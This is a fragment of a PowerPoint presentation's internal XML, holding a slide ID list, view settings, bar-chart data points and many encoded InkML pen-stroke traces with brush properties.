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7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2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notesSlides/notesSlide13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35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76"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="1340" r:id="rId3"/>
    <p:sldId id="1208" r:id="rId4"/>
    <p:sldId id="1209" r:id="rId5"/>
    <p:sldId id="1341" r:id="rId6"/>
    <p:sldId id="1342" r:id="rId7"/>
    <p:sldId id="1210" r:id="rId8"/>
    <p:sldId id="1338" r:id="rId9"/>
    <p:sldId id="627" r:id="rId10"/>
    <p:sldId id="631" r:id="rId11"/>
    <p:sldId id="635" r:id="rId12"/>
    <p:sldId id="264" r:id="rId13"/>
    <p:sldId id="1359" r:id="rId14"/>
    <p:sldId id="628" r:id="rId15"/>
    <p:sldId id="1075" r:id="rId16"/>
    <p:sldId id="1352" r:id="rId17"/>
    <p:sldId id="639" r:id="rId18"/>
    <p:sldId id="1076" r:id="rId19"/>
    <p:sldId id="640" r:id="rId20"/>
    <p:sldId id="318" r:id="rId21"/>
    <p:sldId id="319" r:id="rId22"/>
    <p:sldId id="320" r:id="rId23"/>
    <p:sldId id="321" r:id="rId24"/>
    <p:sldId id="322" r:id="rId25"/>
    <p:sldId id="323" r:id="rId26"/>
    <p:sldId id="642" r:id="rId27"/>
    <p:sldId id="629" r:id="rId28"/>
    <p:sldId id="324" r:id="rId29"/>
    <p:sldId id="333" r:id="rId30"/>
    <p:sldId id="334" r:id="rId31"/>
    <p:sldId id="335" r:id="rId32"/>
    <p:sldId id="1218" r:id="rId33"/>
    <p:sldId id="1118" r:id="rId34"/>
    <p:sldId id="1116" r:id="rId35"/>
    <p:sldId id="1199" r:id="rId36"/>
    <p:sldId id="1188" r:id="rId37"/>
    <p:sldId id="1223" r:id="rId38"/>
    <p:sldId id="1224" r:id="rId39"/>
    <p:sldId id="1343" r:id="rId40"/>
    <p:sldId id="1344" r:id="rId41"/>
    <p:sldId id="338" r:id="rId42"/>
    <p:sldId id="281" r:id="rId43"/>
    <p:sldId id="283" r:id="rId44"/>
    <p:sldId id="1345" r:id="rId45"/>
    <p:sldId id="1265" r:id="rId46"/>
    <p:sldId id="1219" r:id="rId47"/>
    <p:sldId id="1220" r:id="rId48"/>
    <p:sldId id="1221" r:id="rId49"/>
    <p:sldId id="1222" r:id="rId50"/>
    <p:sldId id="1336" r:id="rId51"/>
    <p:sldId id="1337" r:id="rId52"/>
    <p:sldId id="1082" r:id="rId53"/>
    <p:sldId id="1157" r:id="rId54"/>
    <p:sldId id="1354" r:id="rId55"/>
    <p:sldId id="1172" r:id="rId56"/>
    <p:sldId id="1179" r:id="rId57"/>
    <p:sldId id="1350" r:id="rId58"/>
    <p:sldId id="350" r:id="rId59"/>
    <p:sldId id="1356" r:id="rId60"/>
    <p:sldId id="349" r:id="rId61"/>
    <p:sldId id="1349" r:id="rId62"/>
    <p:sldId id="1355" r:id="rId63"/>
    <p:sldId id="1358" r:id="rId64"/>
    <p:sldId id="1173" r:id="rId65"/>
    <p:sldId id="1178" r:id="rId66"/>
    <p:sldId id="1333" r:id="rId67"/>
    <p:sldId id="1186" r:id="rId68"/>
    <p:sldId id="1187" r:id="rId69"/>
    <p:sldId id="1180" r:id="rId70"/>
    <p:sldId id="1181" r:id="rId71"/>
    <p:sldId id="1182" r:id="rId72"/>
    <p:sldId id="1183" r:id="rId73"/>
    <p:sldId id="1234" r:id="rId74"/>
    <p:sldId id="1334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FF40FF"/>
    <a:srgbClr val="95E9EA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946"/>
    <p:restoredTop sz="93546"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="67" d="100"/>
          <a:sy n="67" d="100"/>
        </p:scale>
        <p:origin x="208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⋯</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>2015</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>2016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5</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>47</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>62</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>58</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>34</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>90</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>121</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>105</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>74</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>55</c:v>
                </c:pt>
                <c:pt idx="1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82-534D-BE4B-ACF2D6C357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3112208"/>
        <c:axId val="1663113984"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1663112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3113984"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1663113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3112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7:40:5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1734 0 24575,'-82'32'0,"0"-1"0,1 1 0,-1-1 0,-9 3 0,4-2 0,14-2 0,20-2 0,8-2 0,-18 7 0,20-8 0,0 2 0,-21 9 0,18-12 0,15-3 0,-12 0 0,4 17 0,-10-4 0,5 9 0,10-16 0,-1-6 0,9-9 0,-8 0 0,-1-4 0,9 5 0,-9 0 0,1 0 0,-2 8 0,5-11 0,3 9 0,5-1 0,8-9 0,-2 13 0,6-21 0,4 4 0,-5-5 0,0 0 0,-1 0 0,1 6 0,0 0 0,0 1 0,-6-2 0,5 1 0,-5-5 0,6 4 0,0 1 0,0-5 0,5-1 0,7-7 0,1-5 0,15-11 0,-13 2 0,13-8 0,-10 10 0,6 1 0,-5 0 0,4 5 0,-10-10 0,10 9 0,-10-3 0,10 4 0,-10 1 0,10-5 0,-10 3 0,10-3 0,-10 4 0,10 1 0,-5 0 0,1 0 0,4 0 0,-5-1 0,6 1 0,0 5 0,-5-3 0,3 8 0,-8-9 0,8 5 0,-8-7 0,8 7 0,-8-5 0,8 9 0,-8-8 0,3 8 0,-5-3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7:46:10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20912,'5'-1'0,"2"-3"1741,5 14-1741,5 2 620,-4 2-620,5 3 317,-1 1-317,-3-5 985,3 10-985,-5-10 0,0 5 0,0-6 0,0-6 0,-5 5 0,3-4 0,-3-1 0,0 5 0,3-10 0,-3 10 0,5-5 0,-5 6 0,3-5 0,-3 4 0,5-10 0,-5 4 0,-2-5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7:46:11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24575,'11'17'0,"-3"-4"0,4 10 0,4-4 0,-8 0 0,15 4 0,-8 5 0,8-1 0,-3 7 0,7 0 0,-7-13 0,1 21 0,0-11 0,-4 15 0,9-9 0,-9 6 0,0-16 0,-2 16 0,3-16 0,-8 2 0,11-7 0,-11 7 0,2-8 0,0 6 0,-5-15 0,-1 0 0,0 0 0,-1-5 0,-4 4 0,5-5 0,-6 6 0,0 0 0,5-5 0,-4 4 0,5-16 0,-6 9 0,0-9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7:46:13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8 24575,'-5'-7'0,"-7"7"0,-2 6 0,-3 12 0,-1-5 0,-12 15 0,8-8 0,-11 4 0,19-6 0,-4-11 0,6 3 0,0-8 0,5 8 0,2-3 0,-1 0 0,5 3 0,-10-8 0,10 8 0,-5-3 0,1-1 0,4 5 0,-10-4 0,4 5 0,-5-6 0,5 5 0,-4-10 0,4 10 0,1-4 0,-5-1 0,9 5 0,2-20 0,12 0 0,-4-4 0,3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7:46:1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24575,'6'-13'0,"5"7"0,-4 0 0,10 6 0,-4 0 0,21 0 0,-13 6 0,14-5 0,-10 4 0,-7-5 0,5 0 0,-10 0 0,5 0 0,-6 0 0,5 6 0,-3-5 0,8 10 0,-8-10 0,9 10 0,-10-10 0,10 4 0,-10-5 0,10 0 0,-4 0 0,-1 0 0,5 6 0,-9-5 0,8 4 0,-8-5 0,3 0 0,-5 0 0,0 0 0,0 0 0,6 11 0,-5-3 0,4 15 0,1-10 0,-5 5 0,5-6 0,-6 0 0,0-6 0,-6-6 0,-6-7 0,-1-5 0,-5 5 0,6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7:49:51.0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24575,'0'31'0,"0"3"0,0 2 0,0 5 0,0 5 0,7 1 0,4 16 0,-2-12 0,11 30 0,-18-30 0,14 13 0,-14-18 0,5 0 0,-7-10 0,0 8 0,0-17 0,0 7 0,0-10 0,0 10 0,0 2 0,-7 10 0,5-10 0,-5 8 0,2-17 0,4 7 0,-5 0 0,6-8 0,0 8 0,0-10 0,0 1 0,0-1 0,0 10 0,5-8 0,-3 8 0,8-15 0,-8 4 0,8-10 0,-8 10 0,8-10 0,-8 5 0,3-6 0,-5 0 0,5 0 0,-3 5 0,8 2 0,-8 5 0,3 10 0,0-7 0,-3 1 0,8-11 0,-3-10 0,5-7 0,0-7 0,0 0 0,0 2 0,15 5 0,4-7 0,53 5 0,7-4-576,-10 4 1,3 4 575,-18 3 0,3 1-1123,31-5 1,-3 0 1122,2 11 0,-35-7 0,8 0 0,-2-2 0,18-2 0,0 2 0,-18 4 0,2 3 0,1-1 0,0-4 0,1 0 0,-2 0 0,21 2 0,-3 1 0,-3 5 0,-3-1-591,-19-7 0,0-1 591,12 3 0,-2 0 0,-18 3 0,-1-1 0,17-6 0,2-3 0,-2 6 0,-3 1 0,-15-2 0,-2-1 0,8-3 0,0 1 0,-8 2 0,2 1 0,17 2 0,0-2 0,-16-3 0,0-1 0,15 6 0,-3-1-414,23-6 414,-39 0 0,-1 0 0,18 0 922,-15 0-922,-26 0 2156,-10 0-2156,-12-6 1380,5 5-1380,-10-10 534,5 4-534,-6-10 0,-6-2 0,-2-15 0,-12-14 0,4-1 0,-8-26 0,-5 7 0,-4-18 0,-1-1 0,6 19 0,16 14 0,-4-8 0,4 3 0,-10-27 0,3 18 0,-2-14 0,-8 13 0,5-17 0,-4 18 0,10 4 0,4 27 0,-2-7 0,4 17 0,-3-16 0,2 16 0,5-2 0,3 11 0,-1 6 0,5 0 0,-5 0 0,1 0 0,4-1 0,-5 1 0,6 0 0,0 0 0,-5 0 0,3-1 0,-3 1 0,5 0 0,-5 5 0,-17-5 0,-10 3 0,-49-10 0,8 9 0,11 4 0,2 1 0,-3-1 0,7 5 0,-3 1-1024,-39-6 1024,35 6 0,-5 0 0,-24 0 0,5 0 0,-3 0 0,6 0 0,0 0 0,-1 0 0,6 0 0,-4 0 0,18 0 0,0 0 0,-8 0 0,2 0 0,16 0 0,2 0 0,0 0 0,2 0 0,-35 0 0,17 0 0,15 0 0,10 7 0,7-5 0,-9 12 0,-18-13 1024,13 13-1024,-13-12 0,-11 14 0,4-4 0,-8 0 0,25 3 0,10-7 0,17-1 0,-7 0 0,15-2 0,1-4 0,6 5 0,0-6 0,0 0 0,-1-6 0,-4 5 0,-12-11 0,-7 3 0,-29 0 0,24-3 0,-10 11 0,26-10 0,1 9 0,-1-3 0,6 5 0,2 0 0,5-5 0,-1 3 0,1-3 0,0 5 0,0 0 0,-6 0 0,5 0 0,-10 0 0,9 0 0,-3 0 0,10-6 0,1-6 0,6-1 0,0 0 0,0 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22:57:15.3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10 24575,'18'-5'0,"1"1"0,14 4 0,12 0 0,1 0 0,4 0 0,-15 0 0,13 0 0,-18 0 0,16 0 0,-19 0 0,8 0 0,-12 0 0,9 0 0,-16 0 0,9 0 0,-7 0 0,1 0 0,-1 4 0,7-3 0,-5 3 0,13 1 0,-17-4 0,42 4 0,-39-5 0,39 0 0,-22 0 0,2 0 0,10 0 0,-5 0 0,-7 5 0,0-4 0,-4 5 0,-4-1 0,6-4 0,1 4 0,-8-5 0,6 5 0,-13-4 0,5 4 0,-11-1 0,3-3 0,-2 7 0,14-7 0,-12 7 0,19-7 0,-13 3 0,4 0 0,-6-3 0,30 3 0,-32 0 0,39-3 0,-35 3 0,25-4 0,-10 0 0,10 6 0,-21-5 0,6 4 0,-6-5 0,12 0 0,-11 0 0,9 0 0,-10 0 0,8 0 0,13 0 0,-10 0 0,23 0 0,-23 0 0,10 0 0,-14 0 0,1 0 0,-8 0 0,6 0 0,-5 0 0,-5 0 0,2 0 0,-15 0 0,3 0 0,-4 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-4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22:59:49.3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1204 0 24575,'-9'19'0,"-15"18"0,5-12 0,-12 18 0,-3-2 0,-7 13 0,-2 4 0,-7 5 0,-7 17 0,5-26 0,19-12 0,-2 1 0,-26 21 0,2 11 0,-14-8 0,29-12 0,-18 8 0,12-14-1121,-17 16 1121,3-12 0,21-19 0,-1 10 0,30-30 0,-16 12 0,19-13 0,-2-3 1121,4 3-1121,0-8 0,4 3 0,-3-7 0,7 7 0,-7-7 0,7 7 0,-8-7 0,4 7 0,0-3 0,-3 0 0,7 3 0,-7-7 0,7 7 0,-7-3 0,-1 4 0,-1 0 0,-4 0 0,5 0 0,4 0 0,-3 0 0,11-8 0,-2-14 0,4 1 0,3-10 0,-7 17 0,3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22:59:51.5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24575,'9'28'0,"0"-2"0,4-12 0,3 14 0,9 10 0,-1 4 0,15 12 0,-9-5 0,16 1 0,-12 13 0,13-13 0,-17 0 0,4-10 0,1 1 0,-16-12 0,12 2 0,-15-5 0,-1-6 0,4 5 0,-9-7 0,7 0 0,-1 8 0,3-6 0,2 5 0,-7-7 0,5 8 0,-9-10 0,6 8 0,-7-10 0,6 12 0,2 1 0,0 0 0,2-1 0,-3-1 0,3-5 0,1 5 0,-6-15 0,-5 2 0,-1-11 0,-7 7 0,7-7 0,-7 7 0,7-3 0,-3 4 0,0 0 0,3-4 0,-7 3 0,3-3 0,0 4 0,1 13 0,4-6 0,0 6 0,-4-9 0,-1-4 0,-4-4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23:00:0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3748 2132 24575,'0'-13'0,"0"-1"0,0-5 0,0 1 0,0-8 0,0 6 0,0-1 0,0-4 0,0-11 0,-5-2 0,-7-10 0,-3-1 0,-11-2 0,10 0 0,-14-11 0,11 24 0,-13-23 0,13 23 0,-7-10 0,13 13 0,-9 1 0,6 6 0,-6-5 0,3 13 0,-2-5 0,7 6 0,-7-3 0,6 3 0,-8-4 0,5 5 0,4 0 0,-11-3 0,-4-11 0,-14-5 0,-17-16 0,-4-8 0,14 19 0,-19-27 0,37 42 0,-40-43 0,33 41 0,-20-29 0,5 17 0,-18-12 0,12 11 0,17 15 0,-2 1 0,-23-7 0,21 5 0,0 1 0,-21-1 0,-20-7 0,33 13-451,-36-6 451,10-8 0,35 17 0,-3 0 0,-12-2 0,1 2 0,-28-10 0,36 14 0,-1 1 0,-40-9 0,21 4 0,18 6 0,1 2 0,-1 1 0,-21-5 0,10 13 0,11-5 0,-21 7 0,24 0 0,-1 0 0,4 5 0,14-4 0,-2 16 0,8-10 0,2 10 0,8-8 451,-1 4-451,5-3 0,-3 8 0,7-8 0,-4 7 0,5-3 0,0 0 0,-3 24 0,2-19 0,-3 27 0,0-6 0,1-2 0,-6 14 0,5-16 0,-2 2 0,-2-3 0,4-1 0,-4 1 0,3 13 0,2-10 0,-1 10 0,1-14 0,0 1 0,2-8 0,4 6 0,-4-6 0,9 8 0,-9-1 0,3 9 0,1-14 0,-3 5 0,4-16 0,-1 0 0,2-4 0,0 3 0,3-3 0,-8 12 0,4-6 0,-1 5 0,-3-7 0,4-4 0,0 3 0,1-7 0,4 3 0,0 0 0,-4-3 0,3 4 0,-7-1 0,2 8 0,-4-5 0,0 8 0,5-14 0,1 3 0,0-8 0,3 3 0,-7-3 0,7 4 0,-3 0 0,4 0 0,0 0 0,-4-4 0,3 3 0,-3-3 0,4 4 0,0-8 0,0-6 0,-5-9 0,-1-12 0,-4-1 0,-11-21 0,12 17 0,-16-15 0,18 18 0,-10-6 0,6 6 0,1 3 0,5 6 0,-3 5 0,3-3 0,-4 7 0,4-8 0,1 8 0,4-7 0,0 7 0,-5 1 0,4 1 0,-3-2 0,4 0 0,0-3 0,0 4 0,0 0 0,4 8 0,5 2 0,-3 4 0,2-1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23:00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1 336 24575,'4'-5'0,"-3"-3"0,3 3 0,0 0 0,41-24 0,-2 15 0,2-11 0,3-1-492,34 4 492,-35-4 0,0-1 0,34-2 0,-24-8 0,-16 5 0,-22 16 0,-7-4 0,0 14 0,-11 2 0,3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7:40:59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11431,'0'-12'0,"5"5"4921,17 8-4921,9 8 2288,5 4-2288,8 9 1299,13 1-1299,-6 7 0,15 1 0,-29-8 0,6 5 4636,-21-14-4636,10 7 0,-18-15 0,3 0 0,-10-12 0,3 5 0,-8-5 0,3 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23:03:24.0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939 1286 24575,'-12'22'0,"8"-7"0,-12-2 0,15-17 0,-10-27 0,4 0 0,-29-57 0,-4 4 0,10 24 0,-2-4 0,0-5 0,0 0 0,1 4 0,-1 2-831,1 4 1,1 2 830,6 9 0,-1 3 0,-29-29 0,28 21 0,-22-6 0,13-4 0,3 23 0,-16-25 0,33 36 0,-16-5 0,24 13 0,-5 7 1661,7 5-1661,0 0 0,-4-4 0,8 3 0,-7 5 0,7 5 0,-7 14 0,7-4 0,-7 3 0,7-4 0,-3 0 0,4 0 0,-4 0 0,3 4 0,-7-7 0,-2 25 0,3-17 0,-12 27 0,12-21 0,-4 5 0,2-7 0,4 1 0,0-1 0,-3-4 0,7 3 0,-7-3 0,7 4 0,-7-4 0,7 3 0,-7-3 0,7 0 0,-7 4 0,7-8 0,-4 3 0,5-4 0,-4 0 0,3 0 0,-3 0 0,0 0 0,3 0 0,-3-8 0,4-11 0,4-1 0,-3-6 0,3 8 0,0 4 0,-3 1 0,3 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23:03:25.0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24575,'18'0'0,"8"5"0,14 11 0,-2-2 0,18 1 0,4 2 0,5 7 0,-3-11 0,-4 1 0,-14 6 0,29-3 0,-47-7 0,34 4 0,-40-5 0,1-2 0,-16-8 0,-2 0 0,-7-3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0:28:2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542 616 24575,'-6'-8'0,"-1"-3"0,-7-3 0,1-1 0,-1-12 0,-7-2 0,5-1 0,-5 1 0,1 2 0,11 12 0,-9-4 0,10 6 0,-5 0 0,6-7 0,-5 5 0,11-12 0,-11 13 0,5-13 0,-1 12 0,-4-11 0,10 11 0,-10-5 0,10 0 0,-9 6 0,9-6 0,-3 7 0,5-7 0,-6 5 0,4-5 0,-9 7 0,9 0 0,-3 0 0,5 0 0,-6 6 0,-1 1 0,-6 12 0,0 1 0,-7 12 0,-2-4 0,-6 5 0,6 0 0,-5 2 0,5 0 0,-6-2 0,12-6 0,-2-7 0,22-1 0,-9-12 0,11-1 0,-6-6 0,6-7 0,-4 11 0,4-3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00:28:2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24575,'13'0'0,"-1"0"0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 6 0,0-5 0,6 11 0,-4-5 0,5 1 0,-8 3 0,1-3 0,7-1 0,-6-2 0,6 1 0,-13-4 0,-1 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7:51:39.02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24575,'0'24'0,"0"0"0,0-5 0,0 13 0,0-11 0,9 41 0,-6-21 0,25 40 0,-13-13 0,13 1 0,-7 12 0,-5-30 0,5 30 0,-7-40 0,7 38 0,-7-38 0,4 23 0,-9 0 0,7 4 0,-7 0 0,8-14 0,-9-10 0,3-17 0,-10 16 0,10-16 0,-10 1 0,11 5 0,-4-2 0,1 15 0,5 0 0,-7-15 0,8 11 0,-8-26 0,5 17 0,-6-15 0,1 1 0,4 4 0,-10-4 0,10 5 0,-10-5 0,10 4 0,-10-5 0,11 16 0,-10-7 0,5 7 0,-7-15 0,5 3 0,-4-8 0,5 3 0,-6 1 0,0-5 0,5 10 0,-4 5 0,5-1 0,-1 7 0,-4-10 0,5-5 0,-6-2 0,5-5 0,-4-5 0,5-2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7:51:40.46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298 0 24575,'-5'24'0,"-8"1"0,0-1 0,-34 29 0,27-12 0,-27 14 0,30-11 0,-9-8 0,10 0 0,1-7 0,4-6 0,10-5 0,-10 1 0,10-1 0,-5-6 0,1-6 0,4 5 0,-5-4 0,1-1 0,3 5 0,-3-4 0,5 5 0,0 0 0,-6 0 0,5-1 0,-10-4 0,10 4 0,-4-10 0,5 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7:51:41.82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24575,'18'0'0,"10"5"0,2 10 0,12 1 0,4 6 0,0 0 0,0-5 0,18 17 0,-14-15 0,32 21 0,-31-15 0,-3 1 0,3 4-413,-6-2 0,0 0 413,10-2 0,-2-1 0,18 16 0,-11-23 0,-44-6 0,11-3 0,-15-4 0,-5 0 0,3 2 826,-3 0-826,5 3 0,0-8 0,0 8 0,6-3 0,0 5 0,6 0 0,1 5 0,-7-3 0,0-2 0,-6-7 0,0 0 0,-6-3 0,0 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7:51:46.4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39 24575,'14'-13'0,"2"7"0,-10 0 0,12 6 0,-5 0 0,21 0 0,-3 0 0,16 0 0,-1 0 0,0 0 0,0 0 0,-10 0 0,8 0 0,-8 0 0,11 0 0,-1 0 0,-10 0 0,8 7 0,-8-5 0,0 4 0,-7-6 0,-12 0 0,-5 0 0,6 0 0,0 0 0,7 0 0,-7 0 0,5 6 0,-4 0 0,15 1 0,-7-2 0,6-5 0,-8 0 0,-1 0 0,0 0 0,0 0 0,10 0 0,-13 0 0,12 0 0,-5 0 0,-6 0 0,10 0 0,-13 0 0,5 0 0,0 0 0,-5 0 0,-2 0 0,-5 0 0,0 0 0,6 0 0,-5 0 0,10 0 0,-4 0 0,15 0 0,-8 0 0,18 0 0,-17 0 0,7 0 0,-10 0 0,0 0 0,-5 0 0,4 0 0,-5 6 0,6-5 0,-5 4 0,14 2 0,-12-5 0,13 10 0,-10-11 0,-5 5 0,4-6 0,-10 0 0,4 0 0,1 5 0,6-4 0,1 5 0,5-6 0,-11 0 0,4 0 0,-5 0 0,16 0 0,-7 0 0,7 0 0,0 0 0,-13 0 0,12 0 0,-5 0 0,8 0 0,1 0 0,-3 0 0,-10 0 0,0 0 0,21 0 0,-16 0 0,16 0 0,-11 0 0,-8 0 0,18 0 0,-8 0 0,10 0 0,-9 0 0,-3 0 0,-10 0 0,0 0 0,10 0 0,-7 0 0,12 0 0,-19 0 0,8 0 0,-15 0 0,10 0 0,-4 0 0,5 0 0,0 0 0,1 5 0,-7-4 0,15 5 0,-12-1 0,23-4 0,-18 5 0,29-6 0,-26 0 0,10 0 0,12 0 0,-16 0 0,29 0 0,-18 0 0,0 0 0,0 0 0,-10 0 0,-2 0 0,18 0 0,-26 0 0,34 0 0,-39 0 0,13 0 0,1 0 0,-8 0 0,8 0 0,-11 0 0,-6 0 0,5 0 0,-9 0 0,3 0 0,10 0 0,-6 0 0,13 0 0,-9 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-7 0 0,5 0 0,6 0 0,-8 0 0,11 0 0,-18 0 0,18 0 0,-16 0 0,26 0 0,-10 0 0,5 0 0,8 0 0,-9 0 0,0 0 0,8 0 0,-8 0 0,1-6 0,-3 5 0,-10-10 0,0 10 0,-5-5 0,-2 6 0,-5 0 0,0 0 0,6 0 0,-5 0 0,10-5 0,-10 4 0,5-5 0,-1 6 0,2 0 0,5-5 0,0-2 0,0 0 0,10 2 0,-7-1 0,7 5 0,-10-4 0,10-2 0,2 5 0,21-5 0,-8 7 0,-7-5 0,-15 3 0,-10-9 0,2 10 0,0-4 0,-2 5 0,-5 0 0,0 0 0,0 0 0,0 0 0,16 0 0,3 6 0,16-4 0,-16 5 0,12 0 0,-12-6 0,5 6 0,-2-7 0,-10 0 0,0 0 0,-5 0 0,14 7 0,-18-5 0,18 5 0,-14-7 0,5 0 0,0 0 0,-5 0 0,9 0 0,-13-6 0,7 5 0,-15-10 0,4 10 0,-10-10 0,10 9 0,-5-3 0,1-1 0,4 5 0,-5-4 0,1-1 0,4 5 0,-5-4 0,6 5 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-5 0 0,-2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23:55:42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1920 24575,'9'-4'0,"-4"-1"0,3-4 0,5-12 0,3 4 0,19-23-8503,4-7 8503,35-20 0,-34 28 0,2-1 299,9-1 0,2-1-299,7-11 0,-1-2 0,-11 7 0,2-2-677,5-2 0,5-4 0,-2 0 677,-7 4 0,-2-1 0,2 0 0,10-9 0,3-1 0,-1 0 0,-1 5 0,-1 1 0,-4 1 0,4-14 0,-3 3 0,3 5 0,-2 3 0,-17 12 0,-4 3 0,-5 5 0,0 2 0,5-1 0,-3 3 0,5-10 0,-4 3 0,-22 17 0,-13 15 5223,3-3-5223,0 8 1405,-3-3-1405,3 3 3308,-8 0-3308,-5 1 0,-12 4 0,-47 0 0,-18 5 0,25-1 0,-3 2-449,-7 3 1,2-1 448,17-2 0,2 0 0,-4 3 0,4-1 0,-2-6 0,16 5 0,19-3 0,21-3 0,14-2 0,-6-1 0,3-3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23:55:4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24359,'4'3'0,"-3"3"108,8 19-108,-3-5 36,5 13-36,-2-13 18,-3 1-18,6-4 54,-10-7-54,10 7 0,-11-3 0,7 0 0,-7 0 0,3-5 0,0 4 0,-3-3 0,3 7 0,-4-7 0,4 7 0,-3-7 0,3 7 0,0-3 0,1 4 0,0 0 0,3 0 0,-7-3 0,7 2 0,-3-3 0,0 0 0,3 3 0,-7-7 0,3 3 0,0-4 0,-3 0 0,7-4 0,-7-5 0,3-1 0,-4-3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7:41:2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1409 395 19875,'2'-5'0,"-4"3"2197,-10-9-2197,-6 5 798,5-1-798,-20 1 412,2 6-412,-16 0 1293,1 0-1293,10 0 0,-26 0 0,21-7 0,-58 6 0,8-6-1193,29 1 1,-2 1 1192,0 3 0,2 1 0,7-5 0,1 1 0,1 4 0,2 2 0,-17-1 0,-14 0 0,14 0 0,9 0 0,13 0 0,28 0 0,6 0 2385,0 5-2385,-1-4 0,1 5 0,0-6 0,5 5 0,2-9 0,5 2 0,5-4 0,-4-5 0,5 4 0,-1-5 0,2-6 0,5 5 0,5-10 0,-9 9 0,3-4 0,-6 1 0,2 3 0,0-3 0,3 10 0,-8-4 0,8 10 0,-3-10 0,5 10 0,0-10 0,0 4 0,0-5 0,0 0 0,5-6 0,-9 4 0,8-3 0,-9 10 0,-1-4 0,0 4 0,-6 1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0:02:2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1 517 24575,'14'-9'0,"-1"4"0,7-5 0,3 9 0,25-11 0,3 10 0,40-15 0,-6 15 0,-13-2 0,4-1-2262,-12 0 0,3 0 2262,0 4 0,5 1 0,-3-1 0,13-9 0,1 0 0,-11 6 0,5 1 0,-4-3 0,14-10 0,0-1-708,-17 7 0,2 2 1,-2-1 707,26-7 0,-4-2-281,-17 5 1,-5-1 280,-13 2 0,-9 0 0,-12-10 0,-11 3 3763,-15 5-3763,-1-5 2614,-1 5-2614,-3 1 831,0 4-831,3 0 0,-3 4 0,4-3 0,0 6 0,-4-6 0,7 7 0,-2-7 0,8 3 0,0 0 0,7-4 0,-5 3 0,2 0 0,-9-2 0,-4 7 0,-4-7 0,3 7 0,-15-7 0,0 3 0,-18 0 0,-3 1 0,-6 4 0,-1 0 0,-26 0 0,-23-8 0,12 1 0,-4-1 0,52 3 0,4 5 0,15-4 0,9 3 0,2-3 0,18 4 0,-16 0 0,7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0:02:30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24575,'5'4'0,"-1"12"0,-4-4 0,0 20 0,0-9 0,0 12 0,0-1 0,-5 1 0,4-12 0,-4-3 0,5-7 0,0-3 0,-4 4 0,3-5 0,-3 0 0,8-5 0,-3-4 0,7-5-1696,1 0 0,-3 1 0,2 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0:09:27.0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24575,'6'45'0,"16"24"0,1 12-492,-3-21 0,1 4 0,1 13 0,0 1 0,-1-7 0,1 2 0,5 16 0,2 0 0,-1-10 0,1 0 176,-6-14 0,1 3 1,-1-3 315,5 16 0,1 0 0,-4-19 0,2 2 0,-1 1 0,-2 5 0,0 2 0,2-2 0,0-8 0,2-2 0,-1 3 0,-1 7 0,-2 3 0,1-6 451,7 6 1,-2-8-452,4 22 983,2 1-851,-19-51-132,-7 4 0,4-16 983,-9-6 0,0-5 0,-1-1-683,0-8 0,1-1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0:09:28.30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633 1 24575,'-50'29'0,"18"-13"0,-21 37 0,14-6 0,5-4 0,1 2-984,-13 19 776,1 2 1,-3 3 207,17-23 0,0 0 0,-13 14 0,1 0 0,-13 23 340,24-38-340,21-24 0,7-16 0,24-26 0,-15 11 0,15-15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0:09:29.54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24575,'30'25'0,"-6"-6"0,22 7 0,-15-9 0,9 4 0,6 5 0,11 7-236,-11-10 0,3 2 236,-1 3 0,2 1 0,4 1 0,-1-1 0,28 17 0,-3-10 0,-13-6 0,-22-15 0,-8 0 0,-22-11 0,-8 0 0,3 1 472,-3 4-472,8 0 0,-3 0 0,21 18 0,12 7 0,-5 3 0,3 3-765,26 19 765,-17-13 0,0-1 0,17 11 0,-5-5 0,-22-20 0,-31-22 0,-5-5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0:28:09.745"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.35" units="cm"/>
      <inkml:brushProperty name="height" value="2.1" units="cm"/>
      <inkml:brushProperty name="inkEffects" value="pencil"/>
    </inkml:brush>
  </inkml:definitions>
